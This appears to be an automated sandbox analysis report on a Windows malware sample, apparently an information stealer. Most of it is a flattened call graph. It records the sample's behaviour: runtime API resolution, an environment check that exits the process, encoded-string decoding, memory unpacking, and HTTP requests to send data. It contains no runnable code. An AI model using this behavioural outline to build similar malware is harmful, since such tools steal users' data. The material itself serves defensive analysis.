26770 403091 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 4030aa 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 4030c3 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 4030dc 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 4030f5 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 40310e 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 403127 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 403140 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 403159 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 403172 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 40318b 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 4031a4 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 4031bd 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 4031d6 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 4031ef 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 403208 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 403221 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 40323a 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 403253 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 40326c 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 403285 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 40329e 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 4032b7 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 4032d0 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 4032e9 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 403302 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 40331b 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 403334 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 40334d 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 403366 26827->26828 26829 4045c0 34 API calls 26828->26829 26830 40337f 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 403398 26831->26832 26833 4045c0 34 API calls 26832->26833 26834 4033b1 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 4033ca 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 4033e3 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 4033fc 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 403415 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 40342e 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 403447 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 403460 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 403479 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 403492 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 4034ab 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 4034c4 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 4034dd 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 4034f6 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 40350f 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 403528 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 403541 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 40355a 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 403573 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 40358c 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 4035a5 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 4035be 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 4035d7 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 4035f0 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 403609 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 403622 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 40363b 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 403654 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 40366d 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 403686 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 40369f 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 4036b8 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 4036d1 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 4036ea 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 403703 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 40371c 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 403735 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 40374e 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 403767 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 403780 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 403799 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 4037b2 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 4037cb 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 4037e4 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 4037fd 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 403816 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 40382f 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 403848 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 403861 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 40387a 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 403893 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 4038ac 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 4038c5 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 4038de 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 4038f7 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 403910 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 403929 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 403942 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 40395b 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 403974 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 40398d 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 4039a6 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 4039bf 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 4039d8 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 4039f1 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 403a0a 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 403a23 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 403a3c 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 403a55 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 403a6e 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 403a87 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 403aa0 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 403ab9 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 403ad2 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 403aeb 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 403b04 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 403b1d 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 403b36 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 403b4f 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 403b68 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 403b81 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 403b9a 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 403bb3 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 403bcc 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 403be5 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 403bfe 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 403c17 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 403c30 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 403c49 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 403c62 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 403c7b 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 403c94 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 403cad 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 403cc6 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 403cdf 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 403cf8 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 403d11 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 403d2a 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 403d43 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 403d5c 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 403d75 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 403d8e 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 403da7 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 403dc0 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 403dd9 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 403df2 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 403e0b 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 403e24 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 403e3d 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403e56 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 403e6f 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 403e88 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 403ea1 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 403eba 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 403ed3 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 403eec 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403f05 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403f1e 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403f37 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403f50 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403f69 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403f82 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403f9b 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403fb4 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403fcd 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403fe6 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403fff 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 404018 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 404031 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 40404a 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 404063 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 40407c 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 404095 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 4040ae 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 4040c7 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 4040e0 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 4040f9 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 404112 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 40412b 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 404144 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 40415d 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 404176 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 40418f 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 4041a8 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 4041c1 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 4041da 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 4041f3 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 40420c 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 404225 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 40423e 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 404257 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 404270 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 404289 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 4042a2 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 4042bb 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 4042d4 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 4042ed 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 404306 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 40431f 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 404338 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 404351 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 40436a 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 404383 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 40439c 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 4043b5 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 4043ce 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 4043e7 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 404400 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 404419 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 404432 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 40444b 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 404464 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 40447d 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 404496 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 4044af 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 4044c8 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 4044e1 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 4044fa 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 404513 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 40452c 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 404545 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 40455e 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 404577 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 404590 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 4045a9 27201->27202 27203 419c10 27202->27203 27204 419c20 43 API calls 27203->27204 27205 41a036 8 API calls 27203->27205 27204->27205 27206 41a146 27205->27206 27207 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27205->27207 27208 41a153 8 API calls 27206->27208 27209 41a216 27206->27209 27207->27206 27208->27209 27210 41a298 27209->27210 27211 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27209->27211 27212 41a2a5 6 API calls 27210->27212 27213 41a337 27210->27213 27211->27210 27212->27213 27214 41a344 9 API calls 27213->27214 27215 41a41f 27213->27215 27214->27215 27216 41a4a2 27215->27216 27217 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27215->27217 27218 41a4ab GetProcAddress GetProcAddress 27216->27218 27219 41a4dc 27216->27219 27217->27216 27218->27219 27220 41a515 27219->27220 27221 41a4e5 GetProcAddress GetProcAddress 27219->27221 27222 41a612 27220->27222 27223 41a522 10 API calls 27220->27223 27221->27220 27224 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27222->27224 27225 41a67d 27222->27225 27223->27222 27224->27225 27226 41a686 GetProcAddress 27225->27226 27227 41a69e 27225->27227 27226->27227 27228 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27227->27228 27229 415ca3 27227->27229 27228->27229 27230 401590 27229->27230 27505 401670 27230->27505 27233 41a7a0 lstrcpy 27234 4015b5 27233->27234 27235 41a7a0 lstrcpy 27234->27235 27236 4015c7 27235->27236 27237 41a7a0 lstrcpy 27236->27237 27238 4015d9 27237->27238 27239 41a7a0 lstrcpy 27238->27239 27240 401663 27239->27240 27241 415510 27240->27241 27242 415521 27241->27242 27243 41a820 2 API calls 27242->27243 27244 41552e 27243->27244 27245 41a820 2 API calls 27244->27245 27246 41553b 27245->27246 27247 41a820 2 API calls 27246->27247 27248 415548 27247->27248 27249 41a740 lstrcpy 27248->27249 27250 415555 27249->27250 27251 41a740 lstrcpy 27250->27251 27252 415562 27251->27252 27253 41a740 lstrcpy 27252->27253 27254 41556f 27253->27254 27255 41a740 lstrcpy 27254->27255 27295 41557c 27255->27295 27256 41a740 lstrcpy 27256->27295 27257 41a8a0 lstrcpy 27257->27295 27258 415643 StrCmpCA 27258->27295 27259 4156a0 StrCmpCA 27260 4157dc 27259->27260 27259->27295 27262 41a8a0 lstrcpy 27260->27262 27261 41a7a0 lstrcpy 27261->27295 27263 4157e8 27262->27263 27264 41a820 2 API calls 27263->27264 27265 4157f6 27264->27265 27267 41a820 2 API calls 27265->27267 27266 415856 StrCmpCA 27268 415991 27266->27268 27266->27295 27270 415805 27267->27270 27269 41a8a0 lstrcpy 27268->27269 27272 41599d 27269->27272 27273 401670 lstrcpy 27270->27273 27271 401590 lstrcpy 27271->27295 27274 41a820 2 API calls 27272->27274 27294 415811 27273->27294 27278 4159ab 27274->27278 27275 41a820 lstrlenA lstrcpy 27275->27295 27276 4152c0 29 API calls 27276->27295 27277 4151f0 23 API calls 27277->27295 27280 41a820 2 API calls 27278->27280 27279 415a0b StrCmpCA 27281 415a16 Sleep 27279->27281 27282 415a28 27279->27282 27283 4159ba 27280->27283 27281->27295 27284 41a8a0 lstrcpy 27282->27284 27286 401670 lstrcpy 27283->27286 27285 415a34 27284->27285 27287 41a820 2 API calls 27285->27287 27286->27294 27288 415a43 27287->27288 27289 41a820 2 API calls 27288->27289 27290 415a52 27289->27290 27292 401670 lstrcpy 27290->27292 27291 41578a StrCmpCA 27291->27295 27292->27294 27293 41593f StrCmpCA 27293->27295 27294->26349 27295->27256 27295->27257 27295->27258 27295->27259 27295->27261 27295->27266 27295->27271 27295->27275 27295->27276 27295->27277 27295->27279 27295->27291 27295->27293 27297 417553 GetVolumeInformationA 27296->27297 27298 41754c 27296->27298 27299 417591 27297->27299 27298->27297 27300 4175fc GetProcessHeap HeapAlloc 27299->27300 27301 417619 27300->27301 27302 417628 wsprintfA 27300->27302 27303 41a740 lstrcpy 27301->27303 27304 41a740 lstrcpy 27302->27304 27305 415da7 27303->27305 27304->27305 27305->26370 27307 41a7a0 lstrcpy 27306->27307 27308 404899 27307->27308 27514 4047b0 27308->27514 27310 4048a5 27311 41a740 lstrcpy 27310->27311 27312 4048d7 27311->27312 27313 41a740 lstrcpy 27312->27313 27314 4048e4 27313->27314 27315 41a740 lstrcpy 27314->27315 27316 4048f1 27315->27316 27317 41a740 lstrcpy 27316->27317 27318 4048fe 27317->27318 27319 41a740 lstrcpy 27318->27319 27320 40490b InternetOpenA StrCmpCA 27319->27320 27321 404944 27320->27321 27322 404955 27321->27322 27323 404ecb InternetCloseHandle 27321->27323 27527 418b60 GetSystemTime lstrcpy lstrcpy 27322->27527 27325 404ee8 27323->27325 27522 409ac0 CryptStringToBinaryA 27325->27522 27326 404963 27528 41a920 lstrcpy lstrcpy lstrcatA 27326->27528 27329 404976 27331 41a8a0 lstrcpy 27329->27331 27336 40497f 27331->27336 27332 41a820 2 API calls 27333 404f05 27332->27333 27335 41a9b0 4 API calls 27333->27335 27334 404f27 codecvt 27338 41a7a0 lstrcpy 27334->27338 27337 404f1b 27335->27337 27340 41a9b0 4 API calls 27336->27340 27339 41a8a0 lstrcpy 27337->27339 27351 404f57 27338->27351 27339->27334 27341 4049a9 27340->27341 27342 41a8a0 lstrcpy 27341->27342 27343 4049b2 27342->27343 27344 41a9b0 4 API calls 27343->27344 27345 4049d1 27344->27345 27346 41a8a0 lstrcpy 27345->27346 27347 4049da 27346->27347 27529 41a920 lstrcpy lstrcpy lstrcatA 27347->27529 27349 4049f8 27350 41a8a0 lstrcpy 27349->27350 27352 404a01 27350->27352 27351->26373 27353 41a9b0 4 API calls 27352->27353 27354 404a20 27353->27354 27355 41a8a0 lstrcpy 27354->27355 27356 404a29 27355->27356 27357 41a9b0 4 API calls 27356->27357 27358 404a48 27357->27358 27359 41a8a0 lstrcpy 27358->27359 27360 404a51 27359->27360 27361 41a9b0 4 API calls 27360->27361 27362 404a7d 27361->27362 27530 41a920 lstrcpy lstrcpy lstrcatA 27362->27530 27364 404a84 27365 41a8a0 lstrcpy 27364->27365 27366 404a8d 27365->27366 27367 404aa3 InternetConnectA 27366->27367 27367->27323 27368 404ad3 HttpOpenRequestA 27367->27368 27370 404b28 27368->27370 27371 404ebe InternetCloseHandle 27368->27371 27372 41a9b0 4 API calls 27370->27372 27371->27323 27373 404b3c 27372->27373 27374 41a8a0 lstrcpy 27373->27374 27375 404b45 27374->27375 27531 41a920 lstrcpy lstrcpy lstrcatA 27375->27531 27377 404b63 27378 41a8a0 lstrcpy 27377->27378 27379 404b6c 27378->27379 27380 41a9b0 4 API calls 27379->27380 27381 404b8b 27380->27381 27382 41a8a0 lstrcpy 27381->27382 27383 404b94 27382->27383 27384 41a9b0 4 API calls 27383->27384 27385 404bb5 27384->27385 27386 41a8a0 lstrcpy 27385->27386 27387 404bbe 27386->27387 27388 41a9b0 4 API calls 27387->27388 27389 404bde 27388->27389 27390 41a8a0 lstrcpy 27389->27390 27391 404be7 27390->27391 27392 41a9b0 4 API calls 27391->27392 27393 404c06 27392->27393 27394 41a8a0 lstrcpy 27393->27394 27395 404c0f 27394->27395 27532 41a920 lstrcpy lstrcpy lstrcatA 27395->27532 27397 404c2d 27398 41a8a0 lstrcpy 27397->27398 27399 404c36 27398->27399 27400 41a9b0 4 API calls 27399->27400 27401 404c55 27400->27401 27402 41a8a0 lstrcpy 27401->27402 27403 404c5e 27402->27403 27404 41a9b0 4 API calls 27403->27404 27405 404c7d 27404->27405 27406 41a8a0 lstrcpy 27405->27406 27407 404c86 27406->27407 27533 41a920 lstrcpy lstrcpy lstrcatA 27407->27533 27409 404ca4 27410 41a8a0 lstrcpy 27409->27410 27411 404cad 27410->27411 27412 41a9b0 4 API calls 27411->27412 27413 404ccc 27412->27413 27414 41a8a0 lstrcpy 27413->27414 27415 404cd5 27414->27415 27416 41a9b0 4 API calls 27415->27416 27417 404cf6 27416->27417 27418 41a8a0 lstrcpy 27417->27418 27419 404cff 27418->27419 27420 41a9b0 4 API calls 27419->27420 27421 404d1f 27420->27421 27422 41a8a0 lstrcpy 27421->27422 27423 404d28 27422->27423 27424 41a9b0 4 API calls 27423->27424 27425 404d47 27424->27425 27426 41a8a0 lstrcpy 27425->27426 27427 404d50 27426->27427 27534 41a920 lstrcpy lstrcpy lstrcatA 27427->27534 27429 404d6e 27430 41a8a0 lstrcpy 27429->27430 27431 404d77 27430->27431 27432 41a740 lstrcpy 27431->27432 27433 404d92 27432->27433 27535 41a920 lstrcpy lstrcpy lstrcatA 27433->27535 27435 404db3 27536 41a920 lstrcpy lstrcpy lstrcatA 27435->27536 27437 404dba 27438 41a8a0 lstrcpy 27437->27438 27439 404dc6 27438->27439 27440 404de7 lstrlenA 27439->27440 27441 404dfa 27440->27441 27442 404e03 lstrlenA 27441->27442 27537 41aad0 27442->27537 27444 404e13 HttpSendRequestA 27445 404e32 InternetReadFile 27444->27445 27446 404e67 InternetCloseHandle 27445->27446 27451 404e5e 27445->27451 27448 41a800 27446->27448 27448->27371 27449 41a9b0 4 API calls 27449->27451 27450 41a8a0 lstrcpy 27450->27451 27451->27445 27451->27446 27451->27449 27451->27450 27542 41aad0 27452->27542 27454 4117c4 StrCmpCA 27455 4117d7 27454->27455 27456 4117cf ExitProcess 27454->27456 27457 4117e7 strtok_s 27455->27457 27460 4117f4 27457->27460 27458 4119c2 27458->26375 27459 41199e strtok_s 27459->27460 27460->27458 27460->27459 27461 4118ad StrCmpCA 27460->27461 27462 4118cf StrCmpCA 27460->27462 27463 4118f1 StrCmpCA 27460->27463 27464 411951 StrCmpCA 27460->27464 27465 411970 StrCmpCA 27460->27465 27466 411913 StrCmpCA 27460->27466 27467 411932 StrCmpCA 27460->27467 27468 41185d StrCmpCA 27460->27468 27469 41187f StrCmpCA 27460->27469 27470 41a820 lstrlenA lstrcpy 27460->27470 27471 41a820 2 API calls 27460->27471 27461->27460 27462->27460 27463->27460 27464->27460 27465->27460 27466->27460 27467->27460 27468->27460 27469->27460 27470->27460 27471->27459 27472->26381 27473->26383 27474->26389 27475->26391 27476->26397 27477->26399 27478->26403 27479->26407 27480->26411 27481->26417 27482->26419 27483->26423 27484->26437 27485->26441 27486->26440 27487->26436 27488->26440 27489->26458 27490->26443 27491->26447 27492->26448 27493->26454 27494->26455 27495->26461 27496->26468 27497->26470 27498->26494 27499->26497 27500->26498 27501->26493 27502->26498 27503->26507 27506 41a7a0 lstrcpy 27505->27506 27507 401683 27506->27507 27508 41a7a0 lstrcpy 27507->27508 27509 401695 27508->27509 27510 41a7a0 lstrcpy 27509->27510 27511 4016a7 27510->27511 27512 41a7a0 lstrcpy 27511->27512 27513 4015a3 27512->27513 27513->27233 27538 401030 27514->27538 27518 404838 lstrlenA 27541 41aad0 27518->27541 27520 404848 InternetCrackUrlA 27521 404867 27520->27521 27521->27310 27523 409af9 LocalAlloc 27522->27523 27524 404eee 27522->27524 27523->27524 27525 409b14 CryptStringToBinaryA 27523->27525 27524->27332 27524->27334 27525->27524 27526 409b39 LocalFree 27525->27526 27526->27524 27527->27326 27528->27329 27529->27349 27530->27364 27531->27377 27532->27397 27533->27409 27534->27429 27535->27435 27536->27437 27537->27444 27539 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27538->27539 27540 41aad0 27539->27540 27540->27518 27541->27520 27542->27454 27678 416ab1 902 API calls 27641 4069f3 7 API calls 27642 b3d106 41 API calls __amsg_exit 27543 b20005 27548 b2092b GetPEB 27543->27548 27545 b20030 27549 b2003c 27545->27549 27548->27545 27550 b20049 27549->27550 27562 b20e0f SetErrorMode SetErrorMode 27550->27562 27555 b20265 27556 b202ce VirtualProtect 27555->27556 27557 b2030b 27556->27557 27558 b20439 VirtualFree 27557->27558 27561 b204be LoadLibraryA 27558->27561 27560 b208c7 27561->27560 27563 b20223 27562->27563 27564 b20d90 27563->27564 27565 b20dad 27564->27565 27566 b20238 VirtualAlloc 27565->27566 27567 b20dbb GetPEB 27565->27567 27566->27555 27567->27566 27680 b36a0a ExitProcess 27681 41cafe 219 API calls 4 library calls 27682 b3cd97 170 API calls setSBUpLow 27683 b3be78 162 API calls 2 library calls 26114 401190 26121 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26114->26121 26116 40119e 26117 4011cc 26116->26117 26123 417850 GetProcessHeap HeapAlloc GetUserNameA 26116->26123 26119 4011b7 26119->26117 26120 4011c4 ExitProcess 26119->26120 26122 417939 26121->26122 26122->26116 26124 4178c3 26123->26124 26124->26119 27616 b33823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27646 b2fd67 152 API calls 27684 41ce9f 69 API calls __amsg_exit 27617 b3140b strtok_s 27618 b33823 6 API calls 27619 4088a4 RaiseException task __CxxThrowException@8 27620 4180a5 GetProcessHeap HeapFree 27621 b36c57 692 API calls 27649 b36d18 646 API calls 27622 b3102b StrCmpCA strtok_s lstrlen lstrcpy 27651 41b9b0 RtlUnwind 27686 b33b7d 91 API calls 2 library calls 27687 b36a40 6 API calls

                                                        Executed Functions

                                                        Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                        • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                        • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
